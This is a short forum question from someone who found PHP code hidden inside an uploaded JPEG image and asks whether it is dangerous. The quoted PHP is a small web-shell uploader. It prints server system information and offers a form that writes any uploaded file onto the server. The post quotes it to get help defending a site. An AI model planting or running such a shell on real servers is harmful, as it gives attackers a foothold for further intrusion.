user uploaded jpg file that contains php code – is this a potential virus

A user uploaded some jpg images that seem to contain some php code. File starts with ÿØÿà followed by NUL DLE JFIF NUL SOH SOH SOH NUL NUL NUL NUL ÿá NUL SYN Exif NUL NUL II* … (lots of more null charcters, etc.). Then the following php code:

echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
      else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}

followed by lots of binary code. The image shows a foot with black (like putting the foot on a scanner or copier).

Are those images potentially dangerous? If yes, how.


Source: virus

Leave a Reply